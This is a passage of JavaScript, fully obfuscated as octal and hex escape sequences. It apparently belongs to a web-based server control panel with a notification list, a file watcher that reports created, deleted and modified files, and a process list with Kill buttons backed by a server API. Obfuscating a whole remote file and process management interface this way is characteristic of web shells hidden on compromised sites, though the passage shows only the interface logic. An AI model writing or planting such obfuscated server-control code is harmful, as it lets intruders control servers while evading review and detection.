\102\141\144\147\x65\x28\x29\x3b\xa\x9\x9\x9\164\x68\x69\x73\x2e\162\145\x6e\x64\145\162\116\157\164\151\146\x69\x63\x61\164\151\157\156\x73\50\51\x3b\xa\11\x9\x9\164\150\151\163\56\x74\157\141\x73\x74\x28\x6d\145\163\x73\141\x67\x65\x2c\40\x74\171\x70\x65\40\75\75\75\x20\x27\145\162\162\157\x72\x27\x20\x3f\x20\x27\145\162\x72\157\162\47\40\x3a\x20\x27\163\x75\143\143\145\x73\x73\x27\51\x3b\12\x9\11\x7d\x2c\12\x9\x9\162\x65\x6d\x6f\166\x65\116\157\164\x69\x66\151\x63\141\164\x69\x6f\156\x28\x69\144\x29\x20\173\xa\11\11\x9\x74\150\x69\x73\x2e\156\157\x74\151\146\151\143\141\164\x69\157\156\163\x20\75\x20\x74\x68\151\163\56\x6e\157\x74\151\x66\x69\x63\x61\x74\x69\x6f\x6e\163\56\146\151\154\164\145\x72\50\156\x20\x3d\x3e\x20\x6e\56\151\x64\40\x21\x3d\75\x20\151\144\51\73\12\x9\x9\11\164\150\x69\163\x2e\x75\160\x64\x61\x74\145\x4e\x6f\x74\x69\x66\151\143\x61\164\151\157\156\x42\x61\144\147\145\50\x29\x3b\xa\11\x9\11\x74\150\x69\163\56\x72\145\x6e\x64\145\x72\x4e\157\164\x69\146\151\x63\x61\x74\x69\157\156\163\50\x29\x3b\12\x9\x9\175\54\12\11\x9\143\154\x65\141\162\x41\154\x6c\x4e\x6f\164\x69\x66\151\x63\141\x74\151\157\x6e\163\x28\x29\40\x7b\xa\x9\x9\x9\164\x68\x69\163\56\x6e\157\x74\151\146\x69\143\141\x74\151\x6f\156\x73\40\75\40\133\x5d\73\12\11\x9\x9\x74\150\x69\x73\56\x75\x70\144\141\x74\145\116\x6f\x74\x69\146\151\143\141\164\151\x6f\x6e\x42\x61\x64\x67\145\x28\51\x3b\12\x9\11\x9\164\150\151\163\x2e\162\x65\x6e\x64\x65\162\116\x6f\164\151\146\x69\143\x61\164\151\157\x6e\163\50\51\x3b\xa\x9\11\175\54\12\x9\11\165\160\x64\x61\164\145\116\157\164\x69\146\151\143\141\x74\151\157\x6e\102\x61\x64\x67\x65\x28\51\40\x7b\xa\x9\11\11\143\157\156\x73\164\x20\142\141\144\147\x65\40\75\40\x64\x6f\143\x75\x6d\145\x6e\164\x2e\x67\145\x74\105\154\x65\155\x65\156\x74\x42\171\x49\x64\x28\x27\x6e\x6f\x74\151\x66\151\143\141\x74\151\x6f\x6e\x2d\x62\141\144\x67\x65\x27\x29\x3b\12\x9\x9\11\151\146\x20\50\142\141\144\x67\145\51\40\x7b\12\11\x9\x9\x9\x63\157\156\x73\x74\40\143\157\165\x6e\164\x20\x3d\x20\164\x68\x69\x73\x2e\156\x6f\164\x69\146\x69\143\141\x74\x69\157\156\x73\x2e\154\145\x6e\147\164\x68\73\xa\11\11\x9\x9\x62\141\144\147\145\56\164\x65\x78\x74\103\x6f\156\x74\145\156\164\x20\75\x20\143\x6f\165\156\x74\73\xa\11\x9\x9\11\x62\x61\144\147\x65\56\163\x74\x79\154\145\x2e\x64\x69\163\160\154\x61\x79\x20\75\40\143\x6f\x75\x6e\164\40\x3e\40\x30\40\x3f\x20\47\146\154\145\170\x27\x20\x3a\40\47\x6e\157\x6e\x65\47\73\12\x9\x9\11\175\12\x9\11\175\54\xa\x9\11\162\145\156\x64\x65\x72\x4e\157\164\x69\x66\x69\x63\141\x74\151\x6f\x6e\163\50\51\x20\x7b\xa\11\x9\x9\x63\157\x6e\163\x74\x20\x63\157\156\x74\x61\151\156\x65\162\40\x3d\40\x64\157\143\x75\x6d\145\156\x74\56\x67\145\x74\105\154\x65\x6d\145\156\x74\102\x79\111\144\50\47\x6e\x6f\164\151\x66\x69\143\141\x74\151\x6f\156\163\x2d\x6c\151\163\164\x27\51\73\xa\x9\11\x9\x69\x66\x20\50\41\143\157\x6e\164\141\x69\x6e\x65\x72\x29\40\162\145\164\165\x72\156\73\12\x9\11\x9\x69\x66\x20\x28\164\150\x69\x73\56\156\157\x74\x69\146\x69\143\141\164\151\157\156\x73\x2e\154\x65\156\147\x74\x68\x20\x3d\75\75\x20\x30\x29\40\x7b\xa\x9\11\x9\x9\x63\x6f\x6e\x74\x61\x69\156\x65\162\x2e\x69\156\156\x65\162\110\124\115\x4c\40\75\x20\47\74\x70\x20\163\x74\171\154\x65\x3d\42\x63\157\x6c\157\x72\x3a\x76\x61\162\50\55\55\164\145\170\164\55\x6d\x65\144\51\73\x20\164\145\170\164\55\x61\154\151\147\156\x3a\143\x65\x6e\164\x65\162\73\40\x70\141\144\144\x69\x6e\x67\72\x32\162\x65\155\x3b\42\x3e\x4e\157\x20\x6e\x6f\164\x69\x66\151\x63\141\x74\x69\x6f\x6e\x73\x3c\57\x70\76\x27\73\12\11\11\11\x9\x72\145\x74\165\x72\x6e\73\xa\11\x9\x9\x7d\xa\x9\x9\11\x63\157\x6e\164\141\x69\x6e\145\x72\x2e\x69\156\156\x65\x72\110\x54\x4d\114\40\x3d\x20\x74\150\151\x73\56\x6e\157\164\151\146\x69\x63\141\164\151\x6f\x6e\163\x2e\155\x61\160\x28\x6e\x20\x3d\76\40\140\xa\11\11\x9\x9\x3c\x64\x69\166\40\x63\154\x61\x73\163\x3d\x22\156\157\x74\151\x66\151\x63\x61\x74\151\157\x6e\x2d\x69\164\145\155\40\x24\x7b\x6e\56\164\x79\x70\x65\175\42\76\12\11\x9\x9\x9\11\74\x64\151\166\40\143\x6c\141\163\x73\x3d\x22\156\157\164\151\x66\x69\143\141\x74\x69\x6f\156\55\143\157\x6e\x74\145\156\164\x22\x3e\12\x9\x9\x9\11\11\x9\x3c\x64\x69\166\x20\143\x6c\x61\163\163\x3d\x22\x6e\x6f\164\151\146\151\x63\x61\164\151\157\x6e\x2d\164\151\164\154\145\x22\x3e\x24\x7b\156\56\164\151\x74\x6c\x65\x7d\74\x2f\144\x69\x76\76\xa\x9\x9\11\x9\x9\x9\x3c\x64\x69\x76\x20\143\154\x61\x73\163\x3d\x22\x6e\157\x74\x69\146\x69\x63\x61\164\151\x6f\x6e\x2d\155\x65\x73\163\x61\147\x65\42\x3e\44\173\x6e\x2e\155\x65\163\x73\x61\x67\x65\x7d\74\x2f\x64\151\x76\76\12\11\x9\11\x9\11\11\74\144\151\x76\x20\x63\154\x61\x73\x73\75\x22\x6e\x6f\x74\x69\146\151\x63\141\x74\151\157\156\55\164\x69\x6d\x65\x22\76\x24\173\156\56\x74\151\x6d\145\x7d\x3c\x2f\x64\151\x76\x3e\xa\x9\x9\11\11\x9\74\x2f\x64\x69\x76\x3e\xa\11\x9\11\x9\11\74\163\x70\x61\156\x20\143\x6c\141\163\163\x3d\42\x6e\x6f\x74\x69\146\x69\x63\141\x74\x69\157\156\x2d\143\154\x6f\163\x65\x22\40\x6f\x6e\x63\x6c\x69\x63\153\75\x22\101\x70\160\x2e\x72\x65\155\x6f\x76\x65\x4e\157\164\151\x66\151\143\x61\164\151\157\156\x28\44\173\156\56\151\x64\x7d\51\42\x3e\46\x74\x69\155\x65\163\x3b\74\57\x73\160\141\156\x3e\xa\x9\x9\x9\11\x3c\x2f\144\151\x76\76\xa\11\x9\11\140\x29\x2e\x6a\x6f\151\156\x28\x27\47\x29\73\12\x9\11\175\x2c\12\11\x9\xa\11\11\x2f\x2f\x20\x52\x65\141\x6c\x2d\x74\151\155\145\x20\106\151\x6c\145\40\x57\x61\x74\143\150\x65\162\xa\x9\x9\x77\141\x74\143\x68\145\162\x49\x6e\x74\x65\162\x76\x61\x6c\72\x20\156\165\154\x6c\54\12\x9\x9\167\x61\164\x63\150\x65\162\x53\x6e\141\x70\163\x68\x6f\164\106\x69\x6c\x65\72\40\x6e\165\154\154\x2c\12\x9\11\141\x73\171\156\x63\x20\x73\164\x61\162\164\x46\x69\x6c\145\127\141\164\143\x68\145\x72\50\51\40\173\xa\11\11\11\143\x6f\x6e\163\x74\40\160\x61\164\x68\40\75\40\x64\x6f\x63\x75\x6d\x65\156\x74\56\147\145\x74\x45\154\145\155\145\156\x74\x42\171\111\144\50\47\x77\x61\164\143\x68\x65\x72\x2d\x70\x61\164\150\47\51\x2e\166\x61\x6c\x75\145\40\x7c\x7c\x20\164\150\151\163\x2e\x63\167\x64\x3b\12\11\x9\11\x63\157\x6e\163\164\40\151\x6e\164\145\162\x76\141\154\40\75\40\160\x61\162\x73\x65\x49\x6e\x74\x28\x64\x6f\x63\165\155\x65\x6e\x74\56\x67\x65\x74\x45\x6c\x65\155\145\x6e\164\x42\x79\111\144\50\47\x77\141\x74\143\x68\x65\162\55\x69\x6e\164\145\x72\x76\x61\x6c\x27\51\x2e\x76\x61\x6c\165\145\51\40\x2a\x20\61\60\60\x30\x3b\xa\11\x9\11\x69\x66\x20\x28\41\160\x61\x74\150\x29\40\162\x65\x74\x75\x72\x6e\x20\x74\x68\151\163\x2e\164\x6f\x61\x73\164\50\47\x50\141\164\150\x20\151\x73\40\x72\x65\x71\165\x69\x72\x65\x64\x2e\x27\x2c\40\x27\145\162\162\x6f\162\x27\51\x3b\12\x9\x9\11\x63\x6f\x6e\x73\x74\40\x72\145\x73\x20\75\40\x61\x77\x61\x69\x74\40\x74\150\151\x73\x2e\x61\160\151\50\x27\x73\164\x61\x72\164\x5f\x66\151\x6c\145\x5f\167\141\x74\x63\150\145\x72\47\x2c\40\173\40\160\141\164\150\54\x20\x69\x6e\164\x65\162\x76\x61\154\x20\x7d\51\x3b\xa\x9\x9\11\151\x66\x20\x28\x72\145\163\40\46\x26\x20\x72\x65\x73\56\x73\x74\141\x74\x75\x73\x20\75\x3d\x3d\x20\47\163\x75\143\143\145\x73\x73\47\x29\x20\x7b\12\11\x9\11\x9\164\150\x69\x73\56\x77\141\164\x63\x68\145\x72\x53\156\141\x70\163\x68\x6f\x74\x46\x69\x6c\145\40\75\40\162\145\x73\x2e\x73\156\141\160\163\x68\157\164\137\x66\151\154\x65\73\xa\11\x9\x9\x9\144\x6f\x63\165\155\x65\156\164\x2e\147\x65\164\105\x6c\x65\155\145\x6e\x74\102\x79\111\x64\50\x27\x73\164\x61\162\x74\x2d\x77\x61\x74\143\150\145\162\x2d\142\x74\156\x27\x29\x2e\x73\x74\171\x6c\145\56\144\151\163\160\154\141\171\40\x3d\x20\47\x6e\157\156\x65\47\x3b\xa\x9\11\11\x9\144\157\143\x75\x6d\x65\x6e\x74\x2e\147\x65\164\x45\x6c\x65\x6d\x65\x6e\164\102\x79\111\x64\50\x27\163\x74\157\160\x2d\167\141\x74\143\150\x65\162\55\142\164\x6e\x27\51\x2e\163\x74\x79\154\x65\x2e\144\x69\x73\x70\x6c\141\x79\40\x3d\x20\x27\151\x6e\x6c\151\156\145\55\x62\154\157\143\153\47\73\xa\x9\11\11\x9\144\x6f\x63\x75\x6d\x65\156\164\x2e\x67\x65\x74\x45\x6c\145\155\145\x6e\164\x42\x79\x49\x64\50\x27\x77\141\x74\143\150\x65\x72\x2d\x73\164\141\x74\165\163\x27\x29\x2e\x73\164\x79\154\x65\56\144\x69\163\x70\x6c\x61\x79\40\75\40\x27\x62\154\157\143\153\x27\73\xa\x9\x9\11\x9\x64\x6f\x63\x75\155\145\x6e\164\x2e\147\x65\164\105\154\145\x6d\x65\156\x74\102\171\x49\144\50\x27\x77\141\164\x63\150\145\162\x2d\163\x74\141\164\x75\x73\x27\x29\x2e\151\156\156\x65\x72\x48\x54\115\114\x20\75\x20\x60\x3c\163\160\141\156\x20\163\164\x79\x6c\145\x3d\42\143\157\x6c\157\162\x3a\x76\x61\x72\50\x2d\x2d\x61\143\x63\x65\x6e\164\55\x67\x72\x65\x65\x6e\x29\73\x22\x3e\342\227\x8f\x3c\x2f\x73\x70\141\156\x3e\x20\127\141\x74\x63\x68\151\156\x67\72\x20\x24\x7b\160\x61\x74\x68\x7d\40\x28\x63\x68\145\143\153\151\x6e\x67\x20\145\166\145\162\x79\x20\44\x7b\x69\x6e\164\x65\162\166\141\154\x2f\61\60\x30\60\x7d\163\51\140\73\xa\11\x9\11\x9\164\150\x69\163\56\167\x61\x74\143\150\145\x72\x49\156\x74\145\x72\x76\141\x6c\40\75\x20\163\x65\x74\x49\x6e\x74\x65\162\166\x61\154\x28\x28\x29\40\75\76\40\164\150\x69\x73\x2e\x63\150\145\143\153\106\151\x6c\x65\x43\x68\x61\156\x67\x65\163\50\160\141\x74\150\51\x2c\40\151\156\x74\x65\162\x76\141\x6c\x29\73\xa\11\x9\11\x9\x74\150\151\163\x2e\141\x64\x64\x4e\157\164\x69\x66\x69\143\x61\164\151\x6f\x6e\50\47\x46\x69\154\145\40\x57\x61\164\143\x68\145\x72\x27\54\40\140\123\164\x61\x72\164\x65\x64\40\167\x61\x74\143\150\151\156\x67\x20\x24\173\x70\x61\x74\x68\175\x60\54\40\47\x73\165\143\x63\145\x73\163\47\x29\x3b\12\x9\x9\11\x7d\x20\x65\x6c\x73\x65\x20\173\xa\11\11\x9\11\164\150\x69\163\x2e\x74\x6f\x61\163\164\x28\162\x65\x73\77\56\155\145\x73\163\141\147\145\40\174\x7c\40\x27\106\141\x69\154\x65\144\40\x74\157\40\163\164\x61\162\164\x20\x77\141\x74\143\150\145\162\56\x27\x2c\x20\47\145\x72\162\157\x72\47\51\x3b\xa\x9\x9\x9\175\12\11\11\175\x2c\12\11\11\x73\x74\157\x70\106\x69\154\145\127\141\164\143\x68\x65\162\50\51\x20\173\12\11\11\x9\151\x66\40\50\164\x68\151\x73\56\167\141\x74\143\x68\145\x72\x49\x6e\x74\x65\x72\166\x61\154\51\x20\173\12\x9\x9\11\x9\143\154\x65\x61\162\111\156\164\145\162\166\x61\154\x28\164\x68\151\163\x2e\167\x61\164\143\x68\145\x72\111\x6e\164\x65\162\166\141\x6c\x29\73\12\x9\x9\11\x9\164\150\x69\163\x2e\167\x61\164\x63\x68\x65\x72\111\156\164\x65\162\x76\141\x6c\40\75\x20\156\165\x6c\x6c\x3b\xa\x9\11\x9\175\xa\x9\x9\11\x64\x6f\143\165\x6d\x65\x6e\x74\56\x67\145\x74\x45\x6c\145\x6d\x65\x6e\x74\x42\171\x49\x64\50\47\x73\x74\x61\x72\164\55\x77\141\164\x63\150\x65\162\55\142\x74\x6e\x27\51\56\x73\164\x79\x6c\145\56\144\151\163\x70\154\141\x79\x20\x3d\x20\x27\x69\156\154\151\156\145\x2d\142\x6c\x6f\x63\153\47\73\xa\11\x9\x9\144\x6f\143\x75\x6d\x65\x6e\x74\56\147\145\164\x45\x6c\x65\155\145\156\x74\x42\x79\111\x64\50\x27\163\164\157\160\x2d\167\x61\164\143\150\x65\162\x2d\x62\164\156\x27\51\x2e\x73\x74\x79\x6c\145\56\144\151\x73\x70\x6c\141\171\40\x3d\40\47\156\157\156\145\x27\x3b\12\11\11\11\144\157\x63\x75\x6d\145\x6e\x74\56\x67\x65\x74\105\x6c\145\155\145\x6e\164\102\171\x49\x64\50\47\167\x61\x74\143\x68\x65\162\55\x73\164\141\x74\x75\163\47\x29\x2e\163\164\x79\x6c\145\x2e\x64\151\163\x70\x6c\141\171\40\75\40\47\156\157\x6e\x65\47\x3b\xa\11\x9\x9\164\x68\x69\163\56\x61\144\x64\x4e\x6f\x74\151\x66\151\x63\x61\164\151\157\156\x28\47\106\151\154\x65\40\127\141\164\143\x68\145\x72\x27\54\x20\x27\x53\x74\x6f\160\x70\145\x64\40\x77\x61\164\143\150\x69\156\x67\47\x2c\40\x27\151\x6e\x66\x6f\47\51\73\xa\11\x9\x7d\54\12\11\11\141\163\x79\x6e\143\x20\x63\x68\x65\x63\153\x46\x69\x6c\145\103\150\x61\156\147\x65\163\50\160\141\164\x68\x29\x20\173\xa\x9\x9\11\x69\x66\x20\x28\x21\164\x68\x69\x73\56\167\x61\164\143\150\x65\162\x53\156\x61\160\163\x68\157\x74\106\151\154\145\x29\x20\x72\x65\x74\x75\x72\156\73\12\x9\x9\x9\x63\157\x6e\x73\x74\40\162\145\163\x20\x3d\x20\141\x77\141\151\x74\40\164\150\x69\163\56\141\x70\x69\50\x27\143\150\145\143\153\x5f\146\151\x6c\x65\137\143\150\141\156\x67\145\x73\47\54\40\x7b\40\x70\141\x74\150\54\40\x73\156\x61\160\x73\150\x6f\x74\x5f\x66\x69\x6c\145\x3a\40\164\x68\x69\x73\56\x77\x61\x74\x63\x68\x65\162\x53\156\x61\160\x73\150\157\164\106\151\x6c\145\40\175\51\73\12\x9\x9\x9\x69\146\40\50\x72\145\163\x20\x26\x26\x20\x72\145\x73\56\163\164\141\164\x75\x73\40\x3d\x3d\75\40\x27\163\x75\x63\143\x65\x73\163\x27\x29\x20\173\xa\11\11\11\x9\143\x6f\156\163\164\x20\143\x68\x61\156\x67\x65\x73\x20\75\x20\x72\x65\163\56\x63\150\141\x6e\x67\x65\163\73\xa\x9\x9\11\x9\x6c\x65\164\40\157\165\164\160\165\164\x20\75\x20\x64\x6f\x63\165\x6d\x65\x6e\x74\x2e\x67\145\x74\105\154\x65\x6d\145\x6e\x74\102\171\111\x64\50\x27\167\141\164\143\150\x65\x72\55\x6f\x75\164\160\165\164\x27\51\56\x69\156\156\x65\162\124\x65\x78\164\x3b\xa\11\11\x9\11\x63\157\156\163\164\40\156\157\167\40\x3d\40\156\145\167\x20\x44\x61\164\145\50\51\x2e\x74\x6f\x4c\157\x63\141\x6c\145\x54\x69\155\x65\123\164\162\x69\156\147\50\51\x3b\12\x9\x9\x9\11\x69\x66\x20\50\117\x62\x6a\x65\143\x74\x2e\153\x65\x79\163\x28\x63\150\x61\156\x67\145\x73\56\143\x72\145\x61\x74\x65\144\51\56\x6c\145\x6e\147\x74\x68\x20\76\40\x30\x29\x20\x7b\xa\x9\x9\11\11\x9\157\x75\164\160\165\x74\40\53\75\x20\140\x5c\x6e\x5b\44\x7b\x6e\157\x77\175\135\x20\x43\122\x45\x41\124\105\x44\x3a\134\x6e\44\173\x4f\142\x6a\145\143\x74\56\x6b\145\171\x73\50\x63\150\x61\x6e\147\x65\163\x2e\143\162\145\x61\164\145\144\x29\x2e\x6a\157\x69\x6e\50\x27\x5c\156\x27\x29\175\x5c\x6e\x60\x3b\xa\x9\x9\11\x9\x9\164\150\x69\163\x2e\141\144\144\x4e\x6f\x74\151\146\x69\143\x61\x74\151\x6f\156\50\47\106\151\x6c\145\x20\x57\x61\x74\x63\x68\145\162\47\x2c\x20\140\x24\x7b\117\142\x6a\x65\x63\x74\x2e\153\145\x79\163\x28\143\150\141\x6e\147\145\x73\56\x63\x72\145\x61\x74\145\x64\51\x2e\154\145\x6e\x67\x74\x68\x7d\40\146\151\x6c\x65\50\x73\51\x20\143\162\145\141\164\145\x64\x60\x2c\x20\x27\x69\156\x66\x6f\x27\x29\x3b\xa\x9\11\11\11\175\12\x9\x9\11\11\151\x66\x20\50\x4f\x62\152\145\x63\x74\56\153\145\171\x73\50\143\150\x61\156\147\x65\x73\x2e\x64\145\x6c\145\164\x65\144\51\56\x6c\x65\x6e\147\x74\150\x20\76\x20\x30\51\40\173\xa\x9\11\x9\11\x9\x6f\x75\164\160\x75\164\40\x2b\75\40\140\x5c\x6e\x5b\44\173\x6e\x6f\x77\x7d\135\40\x44\105\x4c\105\x54\105\x44\72\x5c\x6e\x24\x7b\117\x62\x6a\145\143\164\x2e\x6b\145\171\x73\x28\x63\150\x61\156\x67\145\x73\56\x64\x65\x6c\145\164\145\x64\51\56\152\157\x69\156\x28\47\x5c\x6e\47\x29\x7d\134\156\x60\x3b\xa\11\x9\x9\11\x9\x74\x68\x69\163\56\141\144\x64\116\157\x74\151\x66\151\143\141\164\x69\x6f\x6e\50\x27\106\151\x6c\145\40\x57\141\164\x63\150\x65\x72\47\x2c\40\140\44\173\x4f\x62\152\145\x63\164\56\153\145\171\163\50\x63\150\141\x6e\x67\x65\163\x2e\x64\x65\154\145\164\145\x64\x29\56\154\145\156\x67\x74\150\175\x20\x66\151\x6c\x65\x28\163\51\x20\x64\145\154\x65\x74\145\144\x60\54\x20\x27\167\141\x72\156\x69\x6e\x67\x27\51\x3b\12\x9\x9\x9\11\x7d\xa\11\11\11\11\x69\146\x20\50\117\x62\152\145\143\164\x2e\x6b\x65\171\163\x28\x63\150\141\156\147\x65\x73\56\155\157\x64\x69\x66\151\x65\x64\51\56\154\x65\x6e\x67\164\150\x20\x3e\x20\x30\x29\40\173\12\x9\x9\11\11\x9\x6f\165\x74\x70\x75\164\x20\x2b\75\40\x60\134\x6e\133\x24\x7b\x6e\x6f\x77\175\x5d\40\115\x4f\104\x49\106\111\105\104\x3a\x5c\x6e\44\173\117\x62\152\x65\143\164\56\153\145\x79\x73\x28\143\150\x61\x6e\147\x65\163\x2e\155\x6f\144\x69\146\x69\145\144\x29\x2e\152\x6f\x69\156\50\47\134\156\47\x29\175\134\x6e\x60\x3b\xa\11\x9\11\x9\x9\x74\x68\151\x73\56\x61\x64\x64\116\x6f\x74\151\146\151\x63\x61\164\x69\157\156\50\x27\x46\x69\x6c\145\40\x57\141\164\x63\150\x65\x72\47\54\40\140\x24\x7b\117\142\x6a\145\143\x74\56\x6b\145\171\x73\x28\x63\150\141\156\x67\145\163\x2e\155\x6f\144\151\146\151\x65\x64\x29\56\154\x65\x6e\147\164\x68\x7d\x20\146\151\154\x65\50\x73\51\x20\x6d\x6f\x64\x69\x66\151\145\144\x60\x2c\x20\47\x69\156\146\157\47\51\x3b\12\x9\11\x9\x9\x7d\12\x9\x9\11\11\x64\x6f\143\165\155\x65\156\164\x2e\147\145\x74\x45\154\145\155\x65\x6e\164\102\171\x49\144\50\x27\x77\x61\x74\143\150\145\x72\55\x6f\165\x74\x70\x75\x74\x27\x29\x2e\x69\x6e\x6e\x65\x72\x54\x65\170\164\40\x3d\40\x6f\165\x74\160\165\164\x3b\xa\11\x9\11\x9\144\x6f\143\x75\x6d\145\x6e\x74\56\x67\145\164\105\x6c\145\x6d\x65\x6e\x74\102\x79\111\144\x28\47\167\x61\164\x63\x68\145\162\x2d\157\165\x74\160\x75\164\47\51\x2e\163\143\x72\157\154\154\124\157\160\40\x3d\40\144\157\x63\x75\155\145\x6e\164\56\147\145\x74\x45\x6c\145\155\145\x6e\x74\102\171\111\144\50\x27\x77\141\x74\x63\x68\x65\x72\x2d\x6f\165\x74\x70\x75\164\x27\x29\x2e\163\143\162\x6f\x6c\x6c\x48\x65\151\x67\150\x74\73\12\11\x9\x9\175\xa\x9\11\x7d\x2c\xa\11\11\12\x9\x9\x2f\57\40\120\x72\x6f\x63\145\x73\x73\40\x4d\141\x6e\141\x67\145\x72\12\11\11\x70\x72\157\x63\x65\x73\163\x52\x65\146\162\x65\163\x68\111\x6e\164\x65\162\166\141\x6c\x3a\x20\x6e\165\154\x6c\x2c\xa\11\x9\141\x73\171\156\x63\x20\x72\145\x66\x72\145\163\150\120\162\x6f\143\145\163\x73\145\x73\50\x29\x20\x7b\xa\x9\x9\11\143\x6f\x6e\163\x74\40\162\x65\163\40\x3d\x20\141\167\141\151\164\x20\x74\x68\151\163\x2e\141\160\151\50\x27\147\145\x74\137\x70\x72\157\x63\x65\x73\x73\145\x73\x27\x29\73\xa\x9\11\x9\x69\146\x20\x28\x72\145\x73\40\46\x26\x20\162\145\x73\x2e\163\164\141\x74\165\x73\x20\x3d\x3d\75\40\x27\x73\x75\x63\x63\x65\163\x73\x27\x29\x20\x7b\xa\x9\11\x9\11\143\x6f\x6e\163\x74\x20\x74\x62\x6f\x64\x79\x20\75\x20\144\x6f\143\165\155\145\x6e\x74\x2e\147\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\102\x79\111\144\50\47\x70\x72\x6f\143\145\x73\x73\x65\163\55\x6c\x69\x73\164\x27\51\x3b\xa\11\11\11\11\x74\x62\157\144\171\x2e\151\156\156\145\162\110\124\x4d\x4c\40\75\40\x72\x65\x73\x2e\x70\162\x6f\143\145\x73\163\x65\x73\x2e\x6d\141\160\x28\160\40\75\x3e\40\x60\xa\x9\x9\11\11\x9\74\164\x72\x3e\12\11\11\x9\11\x9\x9\x3c\164\144\x3e\44\173\160\x2e\x70\x69\x64\x20\174\174\40\x70\56\120\111\x44\x20\x7c\174\x20\x27\116\x2f\x41\x27\x7d\x3c\x2f\x74\144\76\xa\11\x9\x9\x9\11\x9\74\x74\x64\x3e\x24\173\160\56\x75\163\x65\x72\40\x7c\174\x20\160\x2e\125\123\105\x52\40\x7c\174\x20\x27\x4e\57\x41\47\x7d\x3c\x2f\x74\144\76\12\x9\x9\x9\x9\11\x9\74\x74\144\x3e\44\x7b\160\56\x63\x70\x75\40\174\174\40\x70\133\47\x25\x43\x50\x55\x27\135\x20\174\x7c\40\x27\x4e\x2f\x41\47\175\x3c\57\164\x64\x3e\12\11\x9\x9\11\11\x9\x3c\164\x64\x3e\44\x7b\x70\x2e\x6d\145\x6d\40\x7c\x7c\x20\160\133\47\x25\x4d\x45\115\x27\135\x20\x7c\x7c\x20\x70\x2e\x6d\145\155\40\174\174\x20\47\116\57\101\x27\175\74\x2f\164\x64\76\12\11\x9\x9\x9\11\11\74\164\x64\x20\163\164\x79\154\145\75\x22\155\x61\x78\55\167\x69\x64\164\150\72\x33\60\60\160\x78\73\40\157\x76\145\x72\146\154\157\167\72\x68\x69\144\144\145\x6e\x3b\x20\x74\x65\x78\164\55\157\166\x65\162\146\x6c\157\167\x3a\145\x6c\x6c\151\160\163\151\163\73\42\76\44\173\x28\160\x2e\x63\x6f\x6d\x6d\141\x6e\144\40\174\x7c\40\160\x2e\103\117\x4d\x4d\x41\x4e\x44\x20\174\174\x20\160\x2e\x4e\101\115\x45\x20\174\x7c\x20\47\x4e\x2f\x41\x27\51\56\163\165\142\163\164\x72\x69\x6e\147\x28\x30\54\40\x35\x30\x29\x7d\x3c\x2f\164\144\76\xa\11\x9\11\x9\x9\x9\x3c\x74\144\x3e\74\142\x75\x74\164\x6f\156\40\157\156\143\x6c\x69\143\153\75\x22\x41\160\x70\56\153\x69\x6c\x6c\120\162\x6f\x63\x65\x73\x73\x28\x24\x7b\160\56\160\151\144\x20\174\x7c\40\x70\56\x50\111\104\175\x29\x22\x20\143\154\x61\x73\x73\x3d\42\x64\141\x6e\x67\x65\x72\x2d\142\164\156\42\x20\x73\x74\171\x6c\145\75\x22\x70\x61\x64\x64\151\x6e\x67\72\64\160\170\40\x38\160\170\x3b\40\x66\157\x6e\164\55\163\151\172\x65\x3a\x31\62\160\170\73\42\x3e\x4b\151\x6c\154\74\x2f\x62\x75\164\x74\x6f\156\76\74\x2f\164\144\76\12\11\11\x9\11\x9\74\57\164\162\x3e\xa\x9\x9\x9\11\140\51\56\x6a\x6f\x69\156\x28\47\x27\51\73\xa\x9\11\x9\x7d\xa\11\11\x7d\x2c\xa\x9\11\164\157\147\x67\154\145\x41\165\x74\x6f\x52\x65\x66\x72\145\163\150\120\x72\x6f\x63\145\x73\x73\x65\163\50\x29\x20\x7b\xa\x9\x9\11\151\x66\40\50\x74\150\151\163\56\160\162\x6f\x63\145\163\x73\122\x65\x66\162\x65\163\x68\111\156\x74\x65\162\166\x61\x6c\51\40\173\12\11\x9\x9\x9\143\154\145\141\162\x49\156\x74\x65\162\166\x61\154\50\x74\150\151\163\56\160\x72\x6f\x63\x65\x73\x73\x52\x65\x66\x72\x65\x73\150\x49\x6e\x74\x65\162\166\x61\x6c\x29\73\xa\x9\11\x9\11\164\x68\151\x73\x2e\x70\162\x6f\x63\x65\x73\x73\122\x65\x66\162\x65\163\x68\111\x6e\164\145\162\166\x61\x6c\40\75\x20\x6e\165\154\154\x3b\xa\11\x9\x9\11\x64\x6f\143\x75\155\x65\x6e\164\x2e\147\145\164\x45\154\x65\x6d\145\x6e\164\x42\171\111\x64\x28\x27\x61\x75\x74\157\55\x72\x65\146\x72\145\x73\x68\55\160\162\157\143\145\163\163\145\163\x2d\x62\164\156\x27\51\x2e\x74\145\x78\x74\103\x6f\156\164\x65\156\164\x20\x3d\x20\47\xe2\217\xb1\xef\xb8\x8f\x20\101\x75\x74\157\40\122\145\x66\162\145\x73\150\x20\x28\x35\163\51\x27\73\xa\x9\11\11\175\40\145\x6c\x73\x65\40\173\xa\11\11\x9\11\164\150\x69\163\56\160\x72\157\x63\145\x73\x73\x52\x65\146\162\x65\x73\x68\111\x6e\164\x65\162\166\141\154\x20\75\40\163\145\x74\111\x6e\x74\x65\162\166\141\154\x28\50\51\40\x3d\x3e\x20\164\150\151\x73\x2e\162\145\x66\162\x65\163\x68\x50\162\157\143\145\163\163\145\x73\x28\51\54\x20\65\60\x30\60\x29\73\12\11\x9\x9\x9\x64\x6f\143\165\155\145\156\164\x2e\147\145\x74\105\154\145\x6d\x65\156\x74\102\x79\111\x64\50\47\141\165\164\157\x2d\162\x65\x66\162\x65\163\x68\55\160\x72\x6f\143\145\163\x73\145\163\55\x62\164\x6e\x27\x29\x2e\x74\145\170\x74\103\157\156\164\x65\x6e\x74\40\x3d\x20\x27\xe2\x8f\270\357\270\217\40\123\x74\x6f\160\x20\101\165\x74\x6f\x20\122\x65\x66\x72\145\x73\x68\x27\x3b\12\11\11\x9\11\x74\x68\x69\163\56\162\x65\146\x72\x65\163\x68\x50\x72\x6f\143\145\x73\x73\145\163\x28\51\x3b\xa\x9\x9\11\x7d\12\x9\11\175\54\xa\11\11\141\x73\171\156\143\40\153\151\154\154\x50\162\x6f\143\145\163\x73\x28\x70\151\x64\51\40\x7b\xa\x9\x9\11\x63\157\156\163\x74\40\x63\x6f\156\x66\151\x72\155\145\144\x20\75\x20\141\167\x61\x69\x74\x20\x74\150\x69\163\x2e\163\x68\157\x77\x43\x6f\x6e\x66\151\x72\x6d\115\x6f\144\141\154\x28\x60\x4b\151\x6c\x6c\x20\160\x72\157\143\x65\x73\x73\40\x3c\x73\164\162\157